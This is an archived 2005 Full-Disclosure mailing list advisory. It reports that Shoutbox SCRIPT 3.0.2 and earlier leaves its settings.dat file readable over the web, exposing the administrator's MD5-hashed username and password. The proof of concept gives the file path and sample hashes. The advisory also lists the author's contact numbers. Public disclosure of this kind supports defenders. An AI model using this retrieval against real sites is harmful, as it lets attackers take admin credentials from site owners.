[Full-disclosure] Shoutbox SCRIPT <= 3.0.2 Administrative MD5 Username and Password Retrieval

From: CorryL (corryl_at_sitoverde.com)
Date: 04/19/05

  • Next message: Paul Kurczaba: "Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit"
    To: <full-disclosure@lists.grok.org.uk>
    Date: Tue, 19 Apr 2005 23:16:14 +0200
    
    

    -=[--------------------ADVISORY-------------------]=-
    -=[
         ]=-
    -=[ Shoutbox SCRIPT <= 3.0.2 ]=-
    -=[
         ]=-
    -=[ Author: CorryL www.x0n3-h4ck.org ]=-
    -=[
         ]=-
    -=[----------------------------------------------------]=-

    -=[+] Application: Shoutbox SCRIPT
    -=[+] Version: 3.0.2 and prior
    -=[+] Vendor's URL: http://www.knusperleicht.at
    -=[+] Platform: Windows\Linux\Unix
    -=[+] Bug type: Administrative MD5 Username and Password Retrieval
    -=[+] Exploitation: Remote/Local
    -=[-]
    -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
    -=[+] Reference: www.x0n3-h4ck.org ~ irc.xoned.net #x0n3-h4ck

    ..::[ Descriprion ]::..

    shoutbox and' a script very simple php to be used that to install,
    and' used as a glass showcase where the consumers can leave his/her own
    messages

    ..::[ Bug ]::..

    this software and' affection from a bug,
    a remote attacker exploiting the possibility
    has him/it' to draw sensitive information as user and administrator pass in
    md5.

    ..::[ Proof Of Concept ]::..

    http://host/patch to shout/db/settings.dat

    result:

    .....
    ....
    ....
    $SB_ADMIN[Change_Username] = '189bbbb00c5f1fb7fba9ad9285f193d1';
    $SB_ADMIN[Change_Userpass] = '81dc9bdb52d04dc20036dbd8313ed055';

    ..::[ Workaround ]::..

    noting

    ..::[ Disclousure Timeline ]::..

    [17/04/2005] - Vendor notification
    [19/04/2005] - No patch relase from vendor
    [19/04/2005] - Public disclousure

    CorryL
    corryl80@gmail.com
    www.x0n3-h4ck.org
    Italian Security Team
    Fax (+39) 02700520894
    Tel (+39) 06452215277
    irc.xoned.net #x0n3-h4ck

    _________________________________
    www.seekstat.it is your web stat
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/


  • Next message: Paul Kurczaba: "Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit"